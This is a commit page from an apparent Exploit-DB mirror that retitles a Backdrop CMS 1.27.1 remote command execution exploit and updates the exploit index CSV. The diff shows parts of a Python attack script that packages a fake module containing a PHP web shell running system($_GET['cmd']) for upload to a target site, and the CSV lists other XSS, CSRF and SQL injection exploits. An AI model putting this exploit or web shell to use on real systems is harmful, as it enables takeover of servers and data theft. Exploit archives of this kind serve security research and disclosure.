bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-06-08

Browse source 
2 changes to exploits/shellcodes/ghdb

Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
This commit is contained in:
Exploit-DB 2024-06-08 00:16:25 +00:00
parent 8a32e340d5
commit a99f08beda
2 changed files with 67 additions and 72 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
exploits/php/webapps/52021.py
View file

@ -1,4 +1,4 @@
# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) # Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Date: 04/27/2024 # Date: 04/27/2024
# Exploit Author: Ahmet Ümit BAYRAM # Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://backdropcms.org/ # Vendor Homepage: https://backdropcms.org/
@ -10,8 +10,6 @@ import os
import time import time
import zipfile import zipfile
def create_files(): def create_files():
info_content = """ info_content = """
type = module type = module
@ -33,8 +31,7 @@ version = 1.27.1
timestamp = 1709862662 timestamp = 1709862662
""" """
shell_info_path = "shell/shell.info" shell_info_path = "shell/shell.info"
os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur
oluşturur
with open(shell_info_path, "w") as file: with open(shell_info_path, "w") as file:
file.write(info_content) file.write(info_content)
@ -59,13 +56,11 @@ system($_GET['cmd']);
shell_php_path = "shell/shell.php" shell_php_path = "shell/shell.php"
with open(shell_php_path, "w") as file: with open(shell_php_path, "w") as file:
file.write(shell_content) file.write(shell_content)
return shell_info_path, shell_php_path return shell_info_path, shell_php_path
def create_zip(info_path, php_path): def create_zip(info_path, php_path):
zip_filename = "shell.zip" zip_filename = "shell.zip"
with zipfile.ZipFile(zip_filename, 'w') as zipf: with zipfile.ZipFile(zip_filename, 'w') as zipf:
# Dosyaları shell klasörü altında sakla
zipf.write(info_path, arcname='shell/shell.info') zipf.write(info_path, arcname='shell/shell.info')
zipf.write(php_path, arcname='shell/shell.php') zipf.write(php_path, arcname='shell/shell.php')
return zip_filename return zip_filename

2
files_exploits.csv
View file

@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip, 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,, 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,, 52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info

Can't render this file because it is too large.